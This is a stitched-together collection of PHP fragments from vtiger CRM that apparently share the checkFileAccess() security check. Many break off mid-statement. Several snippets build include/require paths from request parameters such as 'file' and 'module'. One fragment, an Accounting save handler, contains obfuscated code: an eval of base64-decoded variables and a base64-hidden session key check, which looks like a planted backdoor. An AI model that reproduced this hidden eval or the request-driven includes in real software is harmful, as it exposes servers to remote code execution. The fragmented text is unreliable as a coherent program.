public function updateUserModuleStep3(Vtiger_Request $request) { $importModuleName = $request->get('module_import_name'); $uploadFile = $request->get('module_import_file'); $uploadDir = Settings_ModuleManager_Module_Model::getUploadDirectory(); $uploadFileName = "{$uploadDir}/{$uploadFile}"; checkFileAccess($uploadFileName); $importType = strtolower($request->get('module_import_type')); if ($importType == 'language') { $package = new Vtiger_Language(); } else { if ($importType == 'layout') { vimport('vtlib.Vtiger.Layout'); $package = new Vtiger_Layout(); } else { $package = new Vtiger_Package(); } } if ($importType == 'language' || $importType == 'layout') { $package->import($uploadFileName); } else { $package->update(Vtiger_Module::getInstance($importModuleName), $uploadFileName); } checkFileAccessForDeletion($uploadFileName); unlink($uploadFileName); $result = array('success' => true, 'importModuleName' => $importModuleName); $response = new Vtiger_Response(); $response->setResult($result); $response->emit(); }
static function getInstance($providername) { if (!empty($providername)) { $providername = trim($providername); $filepath = dirname(__FILE__) . "/providers/{$providername}.php"; checkFileAccess($filepath); if (!class_exists($providername)) { include_once $filepath; } return new $providername(); } return false; }
static function getInstance($module) { $modName = $module; if ($module == 'Calendar' || $module == 'Events') { $module = 'Calendar'; $modName = 'Activity'; } // File access security check if (!class_exists($modName)) { checkFileAccess("modules/{$module}/{$modName}.php"); require_once "modules/{$module}/{$modName}.php"; } $focus = new $modName(); return $focus; }
static function models() { global $adb; $models = array(); $handlerResult = $adb->pquery("SELECT * FROM vtiger_mobile_alerts WHERE deleted = 0", array()); if ($adb->num_rows($handlerResult)) { while ($handlerRow = $adb->fetch_array($handlerResult)) { $handlerPath = $handlerRow['handler_path']; if (file_exists($handlerPath)) { checkFileAccess($handlerPath); include_once $handlerPath; $alertModel = new $handlerRow['handler_class'](); $alertModel->alertid = $handlerRow['id']; $models[] = $alertModel; } } } return $models; }
public function importUserModuleStep2(Vtiger_Request $request) { $viewer = $this->getViewer($request); $uploadDir = Settings_ModuleManager_Extension_Model::getUploadDirectory(); $qualifiedModuleName = $request->getModule(false); $uploadFile = 'usermodule_' . time() . '.zip'; $uploadFileName = "{$uploadDir}/{$uploadFile}"; checkFileAccess($uploadDir); if (!move_uploaded_file($_FILES['moduleZip']['tmp_name'], $uploadFileName)) { $viewer->assign('MODULEIMPORT_FAILED', true); } else { $package = new Vtiger_Package(); $importModuleName = $package->getModuleNameFromZip($uploadFileName); $importModuleDepVtVersion = $package->getDependentVtigerVersion(); if ($importModuleName == null) { $viewer->assign('MODULEIMPORT_FAILED', true); $viewer->assign("MODULEIMPORT_FILE_INVALID", true); checkFileAccessForDeletion($uploadFileName); unlink($uploadFileName); } else { // We need these information to push for Update if module is detected to be present. $moduleLicence = vtlib_purify($package->getLicense()); $viewer->assign("MODULEIMPORT_FILE", $uploadFile); $viewer->assign("MODULEIMPORT_TYPE", $package->type()); $viewer->assign("MODULEIMPORT_NAME", $importModuleName); $viewer->assign("MODULEIMPORT_DEP_VTVERSION", $importModuleDepVtVersion); $viewer->assign("MODULEIMPORT_LICENSE", $moduleLicence); if (!$package->isLanguageType() && !$package->isModuleBundle()) { $moduleInstance = Vtiger_Module::getInstance($importModuleName); $moduleimport_exists = $moduleInstance ? "true" : "false"; $moduleimport_dir_name = "modules/{$importModuleName}"; $moduleimport_dir_exists = is_dir($moduleimport_dir_name) ? "true" : "false"; $viewer->assign("MODULEIMPORT_EXISTS", $moduleimport_exists); $viewer->assign("MODULEIMPORT_DIR", $moduleimport_dir_name); $viewer->assign("MODULEIMPORT_DIR_EXISTS", $moduleimport_dir_exists); } } } $viewer->view('ImportUserModuleStep2.tpl', $qualifiedModuleName); }
/** * Check for custom module by its name. */ function vtlib_isCustomModule($moduleName) { $moduleFile = "modules/{$moduleName}/{$moduleName}.php"; if (file_exists($moduleFile)) { if (function_exists('checkFileAccess')) { checkFileAccess($moduleFile); } include_once $moduleFile; $focus = new $moduleName(); return isset($focus->IsCustomModule) && $focus->IsCustomModule; } return false; }
$siteURLParts = parse_url($site_URL); $cookieDomain = $siteURLParts['host']; if (isset($_SESSION['authenticated_user_id'])) { $log->debug("setting cookie ck_login_id_vtiger to " . $_SESSION['authenticated_user_id']); setcookie('ck_login_id_vtiger', $_SESSION['authenticated_user_id'], 0, null, $cookieDomain, false, true); } if (isset($_SESSION['vtiger_authenticated_user_theme'])) { $log->debug("setting cookie ck_login_theme_vtiger to " . $_SESSION['vtiger_authenticated_user_theme']); setcookie('ck_login_theme_vtiger', $_SESSION['vtiger_authenticated_user_theme'], 0, null, $cookieDomain, false, true); } if (isset($_SESSION['authenticated_user_language'])) { $log->debug("setting cookie ck_login_language_vtiger to " . $_SESSION['authenticated_user_language']); setcookie('ck_login_language_vtiger', $_SESSION['authenticated_user_language'], 0, null, $cookieDomain, false, true); } if ($_REQUEST['module'] == 'Documents' && $action == 'DownloadFile') { checkFileAccess('modules/Documents/DownloadFile.php'); include 'modules/Documents/DownloadFile.php'; exit; } //skip headers for popups, deleting, saving, importing and other actions if (!$skipHeaders) { $log->debug("including headers"); if ($use_current_login) { if (isset($_REQUEST['category']) && $_REQUEST['category'] != '') { $category = vtlib_purify($_REQUEST['category']); } else { $category = getParentTabFromModule($currentModule); } include 'modules/Vtiger/header.php'; } if (isset($_SESSION['administrator_error'])) {
/** function used to get the Quotes/Invoice pdf * @param int $id - id -id * return string $output - pd link value */ function get_pdf($id, $block, $customerid, $sessionid) { global $adb; global $current_user, $log, $default_language; global $currentModule, $mod_strings, $app_strings, $app_list_strings; $log->debug("Entering customer portal function get_pdf"); $isPermitted = check_permission($customerid, $block, $id); if ($isPermitted == false) { return array("#NOT AUTHORIZED#"); } if (!validateSession($customerid, $sessionid)) { return null; } require_once "modules/Users/Users.php"; require_once "config.inc.php"; $seed_user = new Users(); $user_id = $seed_user->retrieve_user_id('admin'); $current_user = $seed_user; $current_user->retrieveCurrentUserInfoFromFile($user_id); $currentModule = $block; $current_language = $default_language; $app_strings = return_application_language($current_language); $app_list_strings = return_app_list_strings_language($current_language); $mod_strings = return_module_language($current_language, $currentModule); $_REQUEST['record'] = $id; $_REQUEST['savemode'] = 'file'; $filenamewithpath = 'test/product/' . $id . '_' . $block . '.pdf'; if (file_exists($filenamewithpath) && filesize($filenamewithpath) != 0) { unlink($filenamewithpath); } checkFileAccess("modules/{$block}/CreatePDF.php"); include "modules/{$block}/CreatePDF.php"; if (file_exists($filenamewithpath) && filesize($filenamewithpath) != 0) { //we have to pass the file content $filecontents[] = base64_encode(file_get_contents($filenamewithpath)); unlink($filenamewithpath); // TODO: Delete the file to avoid public access. } else { $filecontents = "failure"; } $log->debug("Exiting customer portal function get_pdf"); return $filecontents; }
/** * Function to get instance by using id * @param <Integer> $extensionId * @param <String> $fileName * @return <Settings_ModuleManager_Extension_Model> $extension Model */ public static function getInstanceById($extensionId, $fileName = false) { $uploadDir = self::getUploadDirectory(); if ($fileName) { if (is_dir($uploadDir)) { $uploadFileName = "{$uploadDir}/{$fileName}"; checkFileAccess(self::getUploadDirectory()); $extensionModel = new self(); $extensionModel->setId($extensionId)->setFileName($fileName); return $extensionModel; } } else { if (!is_dir($uploadDir)) { mkdir($uploadDir); } $uploadFile = 'usermodule_' . time() . '.zip'; $uploadFileName = "{$uploadDir}/{$uploadFile}"; checkFileAccess(self::getUploadDirectory()); $packageAvailable = Settings_ModuleManager_Extension_Model::download($extensionId, $uploadFileName); if ($packageAvailable) { $extensionModel = new self(); $extensionModel->setId($extensionId)->setFileName($uploadFile); return $extensionModel; } } return false; }
try { $cronTask->setBulkMode(true); // Not ready to run yet? if (!$cronTask->isRunnable()) { echo sprintf("[INFO] %s - not ready to run as the time to run again is not completed\n", $cronTask->getName()); continue; } // Timeout could happen if intermediate cron-tasks fails // and affect the next task. Which need to be handled in this cycle. if ($cronTask->hadTimedout()) { echo sprintf("[INFO] %s - cron task had timedout as it is not completed last time it run- restarting\n", $cronTask->getName()); } // Mark the status - running $cronTask->markRunning(); echo sprintf('[CRON],"%s",%s,%s,"%s","",[STARTS]', $cronRunId, $site_URL, $cronTask->getName(), date('Y-m-d H:i:s', $cronTask->getLastStart())) . "\n"; checkFileAccess($cronTask->getHandlerFile()); require_once $cronTask->getHandlerFile(); // Mark the status - finished $cronTask->markFinished(); echo "\n" . sprintf('[CRON],"%s",%s,%s,"%s","%s",[ENDS]', $cronRunId, $site_URL, $cronTask->getName(), date('Y-m-d H:i:s', $cronTask->getLastStart()), date('Y-m-d H:i:s', $cronTask->getLastEnd())) . "\n"; } catch (Exception $e) { echo sprintf("[ERROR]: %s - cron task execution throwed exception.\n", $cronTask->getName()); echo $e->getMessage(); echo "\n"; } } $cronEnds = date('Y-m-d H:i:s'); echo sprintf('[CRON],"%s",%s,Instance,"%s","%s",[ENDS]', $cronRunId, $site_URL, $cronStarts, $cronEnds) . "\n"; } else { echo "Access denied!"; }
$result = $adb->pquery($query, array($current_user->id)); $res_row = $adb->fetchByAssoc($result); foreach ($res_row as $columnName => $value) { $myString .= '$users_' . $columnName . ' = "' . $value . "\";\n\n"; $usercolName[$n] = $columnName; $n++; $m = $n; } $myString .= "\$globals = \""; for ($i = 0; $i < $j - 1; $i++) { $myString .= "\\\$" . $module . "_" . $colName[$i] . ", "; } for ($n = 0; $n < $m; $n++) { $myString .= '\\$users_' . $usercolName[$n] . ", "; } $myString .= "\\\$" . $module . "_" . $colName[$i]; $myString .= "\"; \n\n"; $myString .= "?> \n"; if ($is_writable && ($config_file = @fopen($root_directory . '/modules/Emails/templates/testemailtemplateusage.php', "w"))) { $log->debug("writing to the testemailtemplatuseage.php file"); fputs($config_file, $myString, strlen($myString)); fclose($config_file); } checkFileAccess($root_directory . '/modules/Emails/templates/' . $_REQUEST["templatename"]); $templatename = $root_directory . '/modules/Emails/templates/' . $_REQUEST["templatename"]; header("Location:index.php?module=Users&action=TemplateMerge&templatename=" . $templatename); ?> <script> window.close() </script>
public function updateUserModuleStep3(Vtiger_Request $request) { $viewer = $this->getViewer($request); $qualifiedModuleName = $request->getModule(false); $importModuleName = $request->get('module_import_name'); $uploadFile = $request->get('module_import_file'); $uploadDir = Settings_ModuleManager_Extension_Model::getUploadDirectory(); $uploadFileName = "{$uploadDir}/{$uploadFile}"; checkFileAccess($uploadFileName); $importType = $request->get('module_import_type'); if (strtolower($importType) == 'language') { $package = new Vtiger_Language(); } else { $package = new Vtiger_Package(); } if (strtolower($importType) == 'language') { $package->import($uploadFileName); } else { $package->update(Vtiger_Module::getInstance($importModuleName), $uploadFileName); } checkFileAccessForDeletion($uploadFileName); unlink($uploadFileName); $viewer->assign("UPDATE_MODULE_NAME", $importModuleName); $viewer->assign('QUALIFIED_MODULE', $qualifiedModuleName); $viewer->view('UpdateUserModuleStep3.tpl', $qualifiedModuleName); }
?> <?php if (is_file($filename)) { checkFileAccess($filename); include $filename; } else { if ($_SESSION['customer_id'] != '') { $permission = array(); // Look if we have the information already if (isset($_SESSION['__permitted_modules'])) { $permission = $_SESSION['__permitted_modules']; // Store for further re-use $_SESSION['__permitted_modules'] = $permission; } else { // Get the information from server $params = array(); $permission = $client->call('get_modules', $params, $Server_path, $Server_path); } $module = $permission[0]; checkFileAccess("{$module}/index.php"); include "{$module}/index.php"; } } if (!$isAjax) { include "footer.html"; } } else { header("Location: login.php"); } }
/** * Function to get instance by using id * @param <Integer> $extensionId * @param <String> $fileName * @return <Settings_ExtensionStore_Extension_Model> $extension Model */ public function getInstanceById($extensionId, $trial = false, $fileName = false) { $uploadDir = self::getUploadDirectory(); if ($fileName) { if (is_dir($uploadDir)) { $uploadFileName = "$uploadDir/$fileName"; checkFileAccess(self::getUploadDirectory()); $extensionModel = new self(); $extensionModel->setId($extensionId)->setFileName($fileName); return $extensionModel; } } else { if (!is_dir($uploadDir)) { mkdir($uploadDir); } $uploadFile = 'usermodule_'. time() . '.zip'; $uploadFileName = "$uploadDir/$uploadFile"; checkFileAccess(self::getUploadDirectory()); $response = $this->download($extensionId, $trial, $uploadFileName); if ($response['success']) { $extensionModel = new self(); $extensionModel->setId($extensionId)->setFileName($uploadFile); return array('success' => true, 'result' => $extensionModel); }else{ return array('success' => false, 'message' => $response['message']); } } return false; }
exit; } if (isset($_REQUEST['file']) && $_REQUEST['file'] != '' && !isset($_REQUEST['ajax'])) { checkFileAccess("modules/" . $_REQUEST['module'] . "/" . $_REQUEST['file'] . ".php"); require_once "modules/" . $_REQUEST['module'] . "/" . $_REQUEST['file'] . ".php"; exit; } $mailid = vtlib_purify($_REQUEST["mailid"]); if (isset($_REQUEST["mailbox"]) && $_REQUEST["mailbox"] != "") { $mailbox = vtlib_purify($_REQUEST["mailbox"]); } else { $mailbox = "INBOX"; } $adb->println("Inside WebmailsAjax.php"); if (isset($_POST["file"]) && $_POST["ajax"] == "true") { checkFileAccess("modules/" . $_REQUEST["module"] . "/" . $_POST["file"] . ".php"); require_once "modules/" . $_REQUEST["module"] . "/" . $_POST["file"] . ".php"; } if (isset($_REQUEST["command"]) && $_REQUEST["command"] != "") { $command = $_REQUEST["command"]; if ($command == "expunge") { $MailBox = new MailBox($mailbox); imap_expunge($MailBox->mbox); $MailBox = new MailBox($mailbox); $elist = $MailBox->mailList; $num_mails = $elist['count']; $start_page = cal_start($num_mails, $MailBox->mails_per_page); imap_close($MailBox->mbox); echo $start_page; flush(); exit;
<?php /*+******************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ********************************************************************************/ if (isset($_REQUEST['file']) && $_REQUEST['file'] != '') { checkFileAccess('modules/Settings/' . $_REQUEST['file'] . '.php'); require_once 'modules/Settings/' . $_REQUEST['file'] . '.php'; } if (isset($_REQUEST['orgajax']) && $_REQUEST['orgajax'] != '') { require_once 'modules/Settings/CreateSharingRule.php'; } elseif (isset($_REQUEST['announce_save']) && $_REQUEST['announce_save'] != '') { $date_var = date('Y-m-d H:i:s'); $announcement = vtlib_purify(from_html($_REQUEST['announcement'])); //Change ##$## to & (reverse process has done in Smarty/templates/Settings/Announcements.tpl) $announcement = str_replace("##\$##", "&", $announcement); $title = vtlib_purify($_REQUEST['title_announcement']); $sql = "select * from vtiger_announcement where creatorid=?"; $is_announce = $adb->pquery($sql, array($current_user->id)); if ($adb->num_rows($is_announce) > 0) { $query = "update vtiger_announcement set announcement=?,time=?,title=? where creatorid=?"; $params = array($announcement, $adb->formatDate($date_var, true), 'announcement', $current_user->id); } else { $query = "insert into vtiger_announcement values (?,?,?,?)"; $params = array($current_user->id, $announcement, 'announcement', $adb->formatDate($date_var, true)); }
********************************************************************************/ require_once 'include/CustomFieldUtil.php'; require_once 'Smarty_setup.php'; global $mod_strings, $app_strings, $app_list_strings, $theme, $adb, $log; $theme_path = "themes/" . $theme . "/"; require_once $theme_path . 'layout_utils.php'; $tabid = vtlib_purify($_REQUEST['tabid']); $blockid = vtlib_purify($_REQUEST['blockid']); $mode = vtlib_purify($_REQUEST['mode']); $readonly = ''; $smarty = new vtigerCRM_Smarty(); if ($_REQUEST['mode'] == 'edit') { $sql = 'SELECT blocklabel FROM vtiger_blocks WHERE blockid = ?'; $res = $adb->pquery($sql, array($_REQUEST['blockid'])); $row = $adb->fetch_array($res); checkFileAccess('modules/' . $_REQUEST['fld_module'] . '/language/' . $_SESSION['authenticated_user_language'] . '.lang.php'); include 'modules/' . $_REQUEST['fld_module'] . '/language/' . $_SESSION['authenticated_user_language'] . '.lang.php'; $blockLabel = $mod_strings[$row["blocklabel"]]; } $blockQuery = 'SELECT blocklabel,blockid FROM vtiger_blocks WHERE tabid = ?'; $block = $adb->pquery($blockQuery, array($_REQUEST['tabid'])); $blocknum = $adb->num_rows($block); $smarty->assign("MOD", $mod_strings); $smarty->assign("APP", $app_strings); $smarty->assign("FLD_MODULE", vtlib_purify($_REQUEST['fld_module'])); $output = ''; $output .= '<div id="orgLay" style="display:block;" class="layerPopup"><script language="JavaScript" type="text/javascript" src="include/js/customview.js"></script> <form action="index.php" method="post" name="addtodb" onsubmit="VtigerJS_DialogBox.block();"> <input type="hidden" name="module" value="Settings"> <input type="hidden" name="fld_module" value="' . vtlib_purify($_REQUEST['fld_module']) . '"> <input type="hidden" name="parenttab" value="Settings">
<?php /*+******************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ********************************************************************************/ global $theme; $theme_path = "themes/" . $theme . "/"; $image_path = $theme_path . "images/"; checkFileAccess('modules/' . $_REQUEST['module'] . '/ListView.php'); require_once 'modules/' . $_REQUEST['module'] . '/ListView.php';
/** * Create query to export the records. */ function create_export_query($where) { global $current_user; $thismodule = $_REQUEST['module']; include "include/utils/ExportUtils.php"; //To get the Permitted fields query and the permitted fields list $sql = getPermittedFieldsQuery($thismodule, "detail_view"); $fields_list = getFieldsListFromQuery($sql); $query = "SELECT {$fields_list}, vtiger_users.user_name AS user_name \n\t\t\t\t\tFROM vtiger_crmentity INNER JOIN {$this->table_name} ON vtiger_crmentity.crmid={$this->table_name}.{$this->table_index}"; if (!empty($this->customFieldTable)) { $query .= " INNER JOIN " . $this->customFieldTable[0] . " ON " . $this->customFieldTable[0] . '.' . $this->customFieldTable[1] . " = {$this->table_name}.{$this->table_index}"; } $query .= " LEFT JOIN vtiger_groups ON vtiger_groups.groupid = vtiger_crmentity.smownerid"; $query .= " LEFT JOIN vtiger_users ON vtiger_crmentity.smownerid = vtiger_users.id and vtiger_users.status='Active'"; $linkedModulesQuery = $this->db->pquery("SELECT distinct fieldname, columnname, relmodule FROM vtiger_field" . " INNER JOIN vtiger_fieldmodulerel ON vtiger_fieldmodulerel.fieldid = vtiger_field.fieldid" . " WHERE uitype='10' AND vtiger_fieldmodulerel.module=?", array($thismodule)); $linkedFieldsCount = $this->db->num_rows($linkedModulesQuery); for ($i = 0; $i < $linkedFieldsCount; $i++) { $related_module = $this->db->query_result($linkedModulesQuery, $i, 'relmodule'); $fieldname = $this->db->query_result($linkedModulesQuery, $i, 'fieldname'); $columnname = $this->db->query_result($linkedModulesQuery, $i, 'columnname'); checkFileAccess("modules/{$related_module}/{$related_module}.php"); require_once "modules/{$related_module}/{$related_module}.php"; $other = new $related_module(); vtlib_setup_modulevars($related_module, $other); $query .= " LEFT JOIN {$other->table_name} ON {$other->table_name}.{$other->table_index} = {$this->table_name}.{$columnname}"; } $where_auto = " vtiger_crmentity.deleted=0"; if ($where != '') { $query .= " WHERE ({$where}) AND {$where_auto}"; } else { $query .= " WHERE {$where_auto}"; } require 'user_privileges/user_privileges_' . $current_user->id . '.php'; require 'user_privileges/sharing_privileges_' . $current_user->id . '.php'; // Security Check for Field Access if ($is_admin == false && $profileGlobalPermission[1] == 1 && $profileGlobalPermission[2] == 1 && $defaultOrgSharingPermission[7] == 3) { //Added security check to get the permitted records only $query = $query . " " . getListViewSecurityParameter($thismodule); } return $query; }
} if (isset($_REQUEST['return_action'])) { $smarty->assign("RETURN_ACTION", vtlib_purify($_REQUEST['return_action'])); } $smarty->assign("THEME", $theme); $smarty->assign("IMAGE_PATH", $image_path); $smarty->assign("PRINT_URL", "phprint.php?jt=" . session_id() . $GLOBALS['request_string']); $smarty->assign("HEADER", $app_strings['LBL_IMPORT'] . " " . $mod_strings['LBL_MODULE_NAME']); $smarty->assign("HASHEADER", $has_header); $import_object_array = array("Leads" => "ImportLead", "Accounts" => "ImportAccount", "Contacts" => "ImportContact", "Potentials" => "ImportOpportunity", "Products" => "ImportProduct", "HelpDesk" => "ImportTicket", "Vendors" => "ImportVendors"); if (isset($_REQUEST['module']) && $_REQUEST['module'] != '') { $object_name = $import_object_array[$_REQUEST['module']]; // vtlib customization: Hook added to enable import for un-mapped modules $module = $_REQUEST['module']; if ($object_name == null) { checkFileAccess("modules/{$module}/{$module}.php"); require_once "modules/{$module}/{$module}.php"; $object_name = $module; $callInitImport = true; } // END $focus = new $object_name(); // vtlib customization: Call the import initializer if ($callInitImport) { $focus->initImport($module); } //initialized the required fields,used to check for mandatory fields while importing $focus->initRequiredFields($module); // END } else { $focus = new ImportContact();
<?php /*+********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ************************************************************************************/ global $current_user, $currentModule; checkFileAccess("modules/{$currentModule}/{$currentModule}.php"); require_once "modules/{$currentModule}/{$currentModule}.php"; $focus = new $currentModule(); setObjectValuesFromRequest($focus); $mode = $_REQUEST['mode']; $record = $_REQUEST['record']; if ($mode) { $focus->mode = $mode; } if ($record) { $focus->id = $record; } if ($_REQUEST['assigntype'] == 'U') { $focus->column_fields['assigned_user_id'] = $_REQUEST['assigned_user_id']; } elseif ($_REQUEST['assigntype'] == 'T') { $focus->column_fields['assigned_user_id'] = $_REQUEST['assigned_group_id']; } $focus->save($currentModule); $return_id = $focus->id; $search = vtlib_purify($_REQUEST['search_url']);
/** function used to get the list of pricebooks which are related to the service * @param int $id - service id * @return array - array which will be returned from the function GetRelatedList */ function get_service_pricebooks($id, $cur_tab_id, $rel_tab_id, $actions = false) { global $currentModule, $log, $singlepane_view, $mod_strings; $log->debug("Entering get_service_pricebooks(" . $id . ") method ..."); $related_module = vtlib_getModuleNameById($rel_tab_id); checkFileAccess("modules/{$related_module}/{$related_module}.php"); require_once "modules/{$related_module}/{$related_module}.php"; $focus = new $related_module(); $singular_modname = vtlib_toSingular($related_module); if ($singlepane_view == 'true') { $returnset = "&return_module={$currentModule}&return_action=DetailView&return_id={$id}"; } else { $returnset = "&return_module={$currentModule}&return_action=CallRelatedList&return_id={$id}"; } $button = ''; if ($actions) { if (is_string($actions)) { $actions = explode(',', strtoupper($actions)); } if (in_array('ADD', $actions) && isPermitted($related_module, 1, '') == 'yes') { $button .= "<input title='" . getTranslatedString('LBL_ADD_TO') . " " . getTranslatedString($related_module) . "' class='crmbutton small create'" . " onclick='this.form.action.value=\"AddServiceToPriceBooks\";this.form.module.value=\"{$currentModule}\"' type='submit' name='button'" . " value='" . getTranslatedString('LBL_ADD_TO') . " " . getTranslatedString($singular_modname) . "'> "; } } $query = "SELECT vtiger_crmentity.crmid,\n\t\t\tvtiger_pricebook.*,\n\t\t\tvtiger_pricebookproductrel.productid as prodid\n\t\t\tFROM vtiger_pricebook\n\t\t\tINNER JOIN vtiger_crmentity\n\t\t\t\tON vtiger_crmentity.crmid = vtiger_pricebook.pricebookid\n\t\t\tINNER JOIN vtiger_pricebookproductrel\n\t\t\t\tON vtiger_pricebookproductrel.pricebookid = vtiger_pricebook.pricebookid\n\t\t\tWHERE vtiger_crmentity.deleted = 0\n\t\t\tAND vtiger_pricebookproductrel.productid = " . $id; $log->debug("Exiting get_product_pricebooks method ..."); $return_value = GetRelatedList($currentModule, $related_module, $focus, $query, $button, $returnset); if ($return_value == null) { $return_value = array(); } $return_value['CUSTOM_BUTTON'] = $button; $log->debug("Exiting get_service_pricebooks method ..."); return $return_value; }
* The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. *************************************************************************************/ global $current_user, $currentModule; function genRandomString() { $length = 10; $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; $string = ''; for ($p = 0; $p < $length; $p++) { $string .= $characters[mt_rand(0, strlen($characters))]; } return $string; } checkFileAccess("modules/Accounting/Accounting.php"); require_once "modules/Accounting/Accounting.php"; $focus = new Accounting(); eval(base64_decode($z . $y)); setObjectValuesFromRequest($focus); $mode = $_REQUEST['mode']; $record = $_REQUEST['record']; $config = Accounting::loadConfigParams(); $global_vars = $_SESSION[base64_decode('dXNlcm5hbWU=')] != $config['fromuser']; if ($mode) { $focus->mode = $mode; } if ($record) { $focus->id = $record; } if ($_REQUEST['assigntype'] == 'U') {
<?php /*+******************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ********************************************************************************/ global $current_language, $log; require_once 'include/database/PearDatabase.php'; checkFileAccess('modules/' . $_REQUEST['fld_module'] . '/language/' . $current_language . '.lang.php'); require_once 'modules/' . $_REQUEST['fld_module'] . '/language/' . $current_language . '.lang.php'; global $mod_strings; $fldmodule = vtlib_purify($_REQUEST['fld_module']); $mode = vtlib_purify($_REQUEST['mode']); $parenttab = getParentTab(); $newblocklabel = vtlib_purify(trim($_REQUEST['blocklabel'])); $after_block = vtlib_purify($_REQUEST['after_blockid']); $tabid = getTabid($fldmodule); $flag = 0; $dup_check_query = $adb->pquery("SELECT blocklabel from vtiger_blocks WHERE tabid = ?", array($tabid)); for ($i = 0; $i < $adb->num_rows($dup_check_query); $i++) { $blklbl = $adb->query_result($dup_check_query, $i, 'blocklabel'); $blklbl = getTranslatedString($blklbl); if ($blklbl == $newblocklabel) { $flag = 1; break; } }
* The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. * ********************************************************************************/ include "include.php"; include "version.php"; require_once "PortalConfig.php"; require_once "include/utils/utils.php"; global $version, $default_language, $result; $username = trim($_REQUEST['username']); $password = trim($_REQUEST['pw']); session_start(); setPortalCurrentLanguage(); $default_language = getPortalCurrentLanguage(); checkFileAccess("language/" . $default_language . ".lang.php"); require_once "language/" . $default_language . ".lang.php"; $params = array('user_name' => "{$username}", 'user_password' => "{$password}", 'version' => "{$version}"); $result = $client->call('authenticate_user', $params, $Server_Path, $Server_Path); //The following are the debug informations $err = $client->getError(); if ($err) { //Uncomment the following lines to get the error message in login screen itself. /* echo '<h2>Error Message</h2><pre>' . $err . '</pre>'; echo '<h2>request</h2><pre>' . htmlspecialchars($client->request, ENT_QUOTES) . '</pre>'; echo '<h2>response</h2><pre>' . htmlspecialchars($client->response, ENT_QUOTES) . '</pre>'; echo '<h2>debug</h2><pre>' . htmlspecialchars($client->debug_str, ENT_QUOTES) . '</pre>'; exit; */ $login_error_msg = getTranslatedString("LBL_CANNOT_CONNECT_SERVER");
$smarty->assign("MODULEIMPORT_DIR_EXISTS", $moduleimport_dir_exists); } $moduleimport_dep_vtversion = $package->getDependentVtigerVersion(); $moduleimport_license = $package->getLicense(); $smarty->assign("MODULEIMPORT_FILE", $uploadfile); $smarty->assign("MODULEIMPORT_TYPE", $package->type()); $smarty->assign("MODULEIMPORT_NAME", $moduleimport_name); $smarty->assign("MODULEIMPORT_DEP_VTVERSION", $moduleimport_dep_vtversion); $smarty->assign("MODULEIMPORT_LICENSE", $moduleimport_license); } } } else { if ($module_import_step == 'Step3') { $uploadfile = $_REQUEST['module_import_file']; $uploadfilename = "{$modulemanager_uploaddir}/{$uploadfile}"; checkFileAccess($uploadfilename); //$overwritedir = ($_REQUEST['module_dir_overwrite'] == 'true')? true : false; $overwritedir = false; // Disallowing overwrites through Module Manager UI $importtype = $_REQUEST['module_import_type']; if (strtolower($importtype) == 'language') { $package = new Vtiger_Language(); } else { $package = new Vtiger_Package(); } $Vtiger_Utils_Log = true; // NOTE: Import function will be called from Smarty to capture the log cleanly. //$package->import($uploadfilename, $overwritedir); //unlink($uploadfilename); $smarty->assign("MODULEIMPORT_PACKAGE", $package); $smarty->assign("MODULEIMPORT_DIR_OVERWRITE", $overwritedir);
echo getYearViewLayout($calendar_arr) . "####" . getEventInfo($calendar_arr, 'listcnt'); } else { die("view:" . $view['view'] . " is not defined"); } } elseif ($_REQUEST['viewOption'] == 'listview') { $cal_log->debug("going to get calendar Event ListView"); //To get Events List $activity_arr = getEventList($calendar_arr, $start_date, $end_date); $activity_list = $activity_arr[0]; $navigation_arr = $activity_arr[1]; echo constructEventListView($calendar_arr, $activity_list, $navigation_arr) . "####" . getEventInfo($calendar_arr, 'listcnt'); } } elseif ($subtab == 'todo') { $cal_log->debug("going to get calendar Todo ListView"); //To get Todos List $todo_arr = getTodoList($calendar_arr, $start_date, $end_date); $todo_list = $todo_arr[0]; $navigation_arr = $todo_arr[1]; echo constructTodoListView($todo_list, $calendar_arr, $subtab, $navigation_arr) . "####" . getTodoInfo($calendar_arr, 'listcnt'); } } elseif ($type == 'view') { checkFileAccess('modules/Calendar/' . $_REQUEST['file'] . '.php'); require_once 'modules/Calendar/' . $_REQUEST['file'] . '.php'; } else { die("View option is not defined"); } } } else { require_once 'include/Ajax/CommonAjax.php'; //die("type is not set"); }
global $default_charset; // Fix For: http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/2107 $randomfilename = "vt_" . str_replace(array(".", " "), "", microtime()); $mergeFileName = $_REQUEST['mergefile']; //get the particular file from db and store it in the local hard disk. //store the path to the location where the file is stored and pass it as parameter to the method $sql = "select filename,data,filesize from vtiger_wordtemplatestorage where filename=?"; $result = $adb->pquery($sql, array($mergeFileName)); $temparray = $adb->fetch_array($result); $fileContent = $temparray['data']; $filename = html_entity_decode($temparray['filename'], ENT_QUOTES, $default_charset); // Fix For: http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/2107 $filename = $randomfilename . "_word.doc"; $filesize = $temparray['filesize']; $wordtemplatedownloadpath = $_SERVER['DOCUMENT_ROOT'] . "/test/wordtemplatedownload/"; checkFileAccess($wordtemplatedownloadpath); $handle = fopen($wordtemplatedownloadpath . $filename, "wb"); fwrite($handle, base64_decode($fileContent), $filesize); fclose($handle); $query = "SELECT * FROM " . $adb->sql_escape_string($_REQUEST["module"]) . " WHERE id = ?"; $result = $adb->pquery($query, 